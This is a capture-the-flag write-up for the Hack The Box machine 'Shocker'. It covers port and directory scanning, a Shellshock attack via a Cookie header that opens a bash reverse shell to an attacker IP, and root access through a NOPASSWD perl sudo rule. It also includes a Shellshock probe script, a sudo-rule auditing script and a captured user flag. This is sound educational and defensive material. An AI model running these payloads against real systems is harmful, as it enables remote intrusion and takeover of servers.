Shocker executive summary goes here … to-do
Task Overview
- Task in progress
Reconnaissance
Starting with a masscan and then nmap to find the open ports and services on 10.10.10.56:
# sudo masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.56
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-10-27 07:52:29 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 2222/tcp on 10.10.10.56
Discovered open port 80/tcp on 10.10.10.56
^Cwaiting several seconds to exit...
$ nmap -sC -sV -p80,2222 10.10.10.56
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 16:02 AWST
Nmap scan report for 10.10.10.56
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.02 seconds
Webpage (Port 80)
The website doesn't have anything of interest to me at the moment, so let's run gobuster against it:
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.56/ -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.56/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/27 16:10:12 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/server-status (Status: 403)
===============================================================
2020/10/27 16:12:01 Finished
===============================================================
Interesting, we have a /cgi-bin/ directory. Apache executes anything placed in there as a CGI program rather than serving it as a file, so every script in that folder is server-side code we can reach with a request. The 403 only means directory listing is forbidden; individual scripts are still reachable by name. Let's brute-force the folder for scripts, adding a few likely extensions:
# gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -x py,sh,php,js -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: py,sh,php,js
[+] Timeout: 10s
===============================================================
2020/10/27 16:15:23 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.py (Status: 403)
/.hta.sh (Status: 403)
/.hta.php (Status: 403)
/.hta.js (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.py (Status: 403)
/.htpasswd.sh (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.js (Status: 403)
/.htaccess (Status: 403)
/.htaccess.sh (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.js (Status: 403)
/.htaccess.py (Status: 403)
/user.sh (Status: 200)
Let's see what /cgi-bin/user.sh does, noting the Status: 200:
$ curl http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain
Just an uptime test script
04:27:22 up 28 min, 0 users, load average: 0.08, 0.05, 0.01
Okay, as this is an easy box, and given the machine name, Shellshock (CVE-2014-6271) is the obvious thing to try. The bug: when a vulnerable bash starts up and imports an environment variable whose value begins with `() {`, it parses the value as a function definition and then executes whatever follows the closing brace. Apache hands request headers to CGI scripts as environment variables (HTTP_COOKIE, HTTP_USER_AGENT, HTTP_REFERER, and so on), so if user.sh is run by a vulnerable bash, a crafted header runs commands on the server. Here the Cookie header carries a bash reverse shell:
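Before firing a reverse shell it is worth confirming the bug with a harmless canary, and the same idea doubles as a local check for a patched bash. The script below is an added example for this post, not something from the original writeup or from the target: the canary string, the header layout and the URL argument are its own choices. The two `echo` calls in the header matter, because they emit the blank line that terminates the CGI response headers so the canary ends up in the HTTP body instead of being discarded as a malformed header.

```shell
#!/bin/sh
# Added example (not from the original writeup): a non-destructive Shellshock
# (CVE-2014-6271) probe for a CGI endpoint plus the classic local bash check.
# Canary, header layout and the URL argument are assumptions of this example.

# Local check: a vulnerable bash imports the exported value as a function
# definition and runs the trailing command, so "vulnerable" is printed.
shellshock_local_check() {
  if env x='() { :;}; echo vulnerable' bash -c 'true' 2>/dev/null | grep -q vulnerable; then
    echo vulnerable
  else
    echo patched
  fi
}

# Build the probe header. "echo; echo" ends the CGI headers so the canary
# lands in the body. Any header Apache exports into the CGI environment
# (HTTP_USER_AGENT, HTTP_COOKIE, HTTP_REFERER, ...) works the same way;
# User-Agent is used here because it is also written to access.log.
shellshock_probe_header() {
  # $1: canary string to echo back
  printf 'User-Agent: () { :; }; echo; echo; echo %s' "$1"
}

# Decide from a response body whether the canary was executed server-side.
response_shows_canary() {
  # $1: response body, $2: canary -> prints vulnerable / not-vulnerable
  case $1 in
    *"$2"*) echo vulnerable ;;
    *)      echo not-vulnerable ;;
  esac
}

# Remote probe (needs network). $1: URL of a CGI script,
# e.g. http://10.10.10.56/cgi-bin/user.sh
shellshock_probe() {
  canary="shockprobe.$$.$(date +%s)"
  body=$(curl -s --max-time 10 -H "$(shellshock_probe_header "$canary")" "$1")
  response_shows_canary "$body" "$canary"
}

echo "local bash: $(shellshock_local_check)"
if [ "$#" -ge 1 ]; then
  echo "$1: $(shellshock_probe "$1")"
fi
```

Run it as `sh probe.sh http://10.10.10.56/cgi-bin/user.sh`; a "vulnerable" verdict means the canary was executed by the script's interpreter, and the Cookie payload in the writeup will work for the same reason. Defensively, the same `() {` prefix in a User-Agent or Referer is what to grep for in Apache access logs, since those two headers are logged by default.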
$ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.3/4443 0>&1' http://10.10.10.56/cgi-bin/user.sh
Listening with nc on port 4443, we catch the reverse shell:
$ nc -nlvp 4443
listening on [any] 4443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.56] 45950
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ ls
ls
user.sh
shelly@Shocker:/usr/lib/cgi-bin$
Let's confirm who we are and grab the user flag:
shelly@Shocker:/usr$ whoami
whoami
shelly
shelly@Shocker:/usr$ wc -c /home/shelly/user.txt
wc -c /home/shelly/user.txt
33 /home/shelly/user.txt
shelly@Shocker:/usr$ cat /home/shelly/user.txt
cat /home/shelly/user.txt
2ec24e11320026d1e70ff3e16695b233
shelly@Shocker:/usr$
Privilege Escalation
Now, on an easy box, the first command that is always worth running is sudo -l, which lists the commands this user may run through sudo and, in particular, any that need no password:
$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
And we notice that perl can in fact be run as root without a password. Since perl can exec any program, a NOPASSWD entry for an interpreter is equivalent to a root shell, so we use it to spawn one:
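The perl entry is one instance of a general pattern: any NOPASSWD sudo rule whose target can spawn a shell (interpreters, editors, pagers, find, env) is a root shell in disguise. The script below is an added example for this post, not from the original writeup or from the box; it scans `sudo -l` output for such entries. RISKY is an assumed list of common shell-escape binaries, and SAMPLE_SUDO_L is a constructed copy of the output shown above.

```shell
#!/bin/sh
# Added example (not from the original writeup): flag NOPASSWD sudo entries
# whose target binary can spawn a shell. RISKY is an assumed list;
# SAMPLE_SUDO_L is a constructed copy of the sudo -l output in this post.

RISKY='perl python python3 ruby bash sh dash zsh vi vim less more awk find env nmap'

SAMPLE_SUDO_L='Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl'

# $1: text of `sudo -l`. Prints "RISKY: <path>" for every NOPASSWD command
# whose basename is in RISKY, and "RISKY: ALL" for an unrestricted rule.
# Several commands may share one line separated by commas, so each matching
# line is split on commas before the command path is extracted; any
# arguments after the path are dropped.
flag_risky_nopasswd() {
  printf '%s\n' "$1" | grep NOPASSWD | tr ',' '\n' | while IFS= read -r entry; do
    cmd=$(printf '%s' "$entry" | sed 's/.*NOPASSWD: *//; s/^ *//; s/ .*//')
    if [ "$cmd" = "ALL" ]; then
      printf 'RISKY: ALL\n'
      continue
    fi
    base=${cmd##*/}
    for r in $RISKY; do
      if [ "$base" = "$r" ]; then
        printf 'RISKY: %s\n' "$cmd"
      fi
    done
  done
  return 0
}

# Stand-alone run against the constructed sample. To audit a live system,
# replace it with:  flag_risky_nopasswd "$(sudo -l)"
flag_risky_nopasswd "$SAMPLE_SUDO_L"
```

On this box the only hit is /usr/bin/perl, which is exactly the entry exploited next. The fix on the defending side is the usual one: NOPASSWD rules should name a specific, non-interactive binary with fixed arguments, never an interpreter or editor.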
$ sudo perl -e 'exec "/bin/bash"'
sudo perl -e 'exec "/bin/bash"'
whoami
root
wc -c /root/root.txt
33 /root/root.txt
cat /root/root.txt
Thanks for reading. BQ